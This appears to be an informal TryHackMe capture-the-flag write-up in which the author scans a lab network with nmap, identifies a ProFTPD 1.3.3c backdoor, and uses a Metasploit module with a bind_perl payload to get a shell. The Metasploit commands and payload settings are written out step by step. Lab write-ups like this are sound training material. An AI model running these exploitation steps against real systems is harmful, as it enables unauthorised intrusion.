TryHackMe Directory
Flags will be BOLD
LETS GET SOME ROOT!
Since this one is a “Black Box” scenario we need to just try everything we can
First lets find the correct IP
nmap -n -sn 10.10.77.0-255

Looks like we have 2 possible choices, lets look into them
nmap 10.10.77.78
nmap 10.10.77.141

Lets go with the “basic” IP of 78 due to having 3 common exploitable port types
Lets look for any low hanging fruit
sudo nmap --script vuln -p 21-80 10.10.77.78 -v
This just seemed to freeze after 5ish minutes
Now lets try to see what is running
nmap -Pn -sV 10.10.77.78

Well this looks like it could be promising… Lets lookup that ProFTPD version
msfconsole
search ProFTPD 1.3.3c

We see that we may have a backdoor command we can try
use 4
set RHOSTS 10.10.77.78
show options

Lets try to run it!
run
Annnnnnddddd….. Fail…hmmmm lets look this up

This Link This link shows a possible answer
**nmap –script ftp-proftpd-backdoor -p 21
nmap --script ftp-proftpd-backdoor -p 21 10.10.77.78

Well.. Yay? that was a bit anticlimactic… Now how do we use it?
After some trial and error it seems we may not actually have a backdoor yet
After a new connection we have a new IP 10..10.38.231
More connection issues.. lets reboot
Lets try msfconsole again
New IP of 10.10.144.237
Whelp thats not working time to try another path
… I lied after some research we may need to pick a payload
msfconsole
search proftp

use 6
set RHOST 10.10.144.237
Show Options

Run

Now I see we need to select a payload
Show Payloads

set payload cmd/unix/bind_perl
ANNNNDDDD We are in!

